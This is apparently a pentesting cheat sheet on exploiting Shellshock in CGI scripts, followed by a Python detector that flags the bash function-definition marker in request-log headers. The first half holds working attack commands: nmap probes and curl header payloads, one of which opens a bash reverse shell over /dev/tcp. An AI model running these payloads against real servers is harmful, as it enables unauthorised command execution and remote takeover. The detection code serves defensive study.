Iterate over the cgi-bin directory looking for *.sh, *.pl, *.cgi and *.py scripts.

When a script is found, use the nmap http-shellshock script:

nmap -sV -p- --script http-shellshock <target>
nmap -sV -p- --script http-shellshock --script-args uri=/cgi-bin/bin,cmd=ls <target>

If vulnerable, it is possible to exploit it:

# payload=reverse rhost= lhost=<LAB IP> lport=<port> pages=/cgi-bin/

Or manually through curl:

# Reflected
curl -H 'User-Agent: () { :; }; echo "VULNERABLE TO SHELLSHOCK"' 2>/dev/null| grep 'VULNERABLE'

# Blind with sleep (you could also make a ping or web request to yourself and monitor for it with tcpdump)
curl -H 'User-Agent: () { :; }; /bin/bash -c "sleep 5"'

# Out-Of-Band Use Cookie as alternative to User-Agent
curl -H 'Cookie: () { :;}; /bin/bash -i >& /dev/tcp/ 0>&1'
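On the defending side, the same marker the probes above rely on, a bash function definition `() {` at the start of a header value that the CGI handler exports as an environment variable, is what a log-based detection keys on. The following Python is an added example, not part of the original page: it parses a constructed, hypothetical request-log format (source IP, method, path, then `Header: value` fields separated by ` | `; the IPs are documentation addresses) and flags every header carrying the signature, tolerating the spacing variants seen in the curl commands above (`() { :; };`, `() { :;};`, `(){`). It also marks whether the request hit the /cgi-bin/ directory the page targets, which is where such a header is actually reachable by bash.

```python
import re

# Shellshock probes put a bash function definition, "() {", at the very start
# of a request header value (User-Agent and Cookie on this page; Referer and
# others work the same way). Spacing varies between tools, so match "()"
# followed by optional whitespace and "{". Anchoring at the start of the value
# keeps URLs or free text that merely contain "(){" from matching.
SHELLSHOCK_RE = re.compile(r"^\s*\(\s*\)\s*\{")

# Constructed log format for this example (hypothetical, not a real server's):
#   <src_ip> <method> <path> | <Header>: <value> | <Header>: <value> ...
# A real deployment would pull the same fields from a WAF, proxy or access log.
SAMPLE_LOG = """\
203.0.113.5 GET /cgi-bin/status.sh | User-Agent: Mozilla/5.0 | Accept: */*
203.0.113.7 GET /cgi-bin/status.sh | User-Agent: () { :; }; echo "VULNERABLE TO SHELLSHOCK" | Accept: */*
203.0.113.7 GET /cgi-bin/status.sh | Cookie: () { :;}; /bin/bash -c "sleep 5" | Accept: */*
198.51.100.2 GET /index.html | User-Agent: curl/8.0 | Referer: https://example.com/(){ not a function }
198.51.100.9 POST /cgi-bin/form.cgi | Referer: (){ :; }; echo probe | Content-Type: text/plain
"""


def is_shellshock_value(value):
    """True if a header value starts with the bash function-definition marker."""
    return SHELLSHOCK_RE.search(value) is not None


def parse_line(line):
    """Split one constructed log line into (src_ip, method, path, {header: value})."""
    parts = [p.strip() for p in line.split(" | ")]
    src_ip, method, path = parts[0].split(" ", 2)
    headers = {}
    for field in parts[1:]:
        name, _, value = field.partition(":")
        # Header names are case-insensitive, so normalise them for reporting.
        headers[name.strip().lower()] = value.strip()
    return src_ip, method, path, headers


def find_shellshock(log_text):
    """Return one hit per (line, header) that carries the Shellshock marker."""
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        src_ip, method, path, headers = parse_line(line)
        for name, value in headers.items():
            if is_shellshock_value(value):
                hits.append({
                    "src_ip": src_ip,
                    "method": method,
                    "path": path,
                    "header": name,
                    # Requests into the CGI directory are the ones bash can
                    # actually execute; elsewhere the header is only a probe.
                    "cgi": path.startswith("/cgi-bin/"),
                })
    return hits


if __name__ == "__main__":
    for hit in find_shellshock(SAMPLE_LOG):
        print(f"{hit['src_ip']} {hit['method']} {hit['path']} "
              f"via {hit['header']} (cgi={hit['cgi']})")
```

Run as a script, the three injected lines are reported and the benign Referer that only contains `(){` mid-URL is not; the anchored regex is what makes that distinction, and it is the part to keep if the log format is swapped for a real one.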
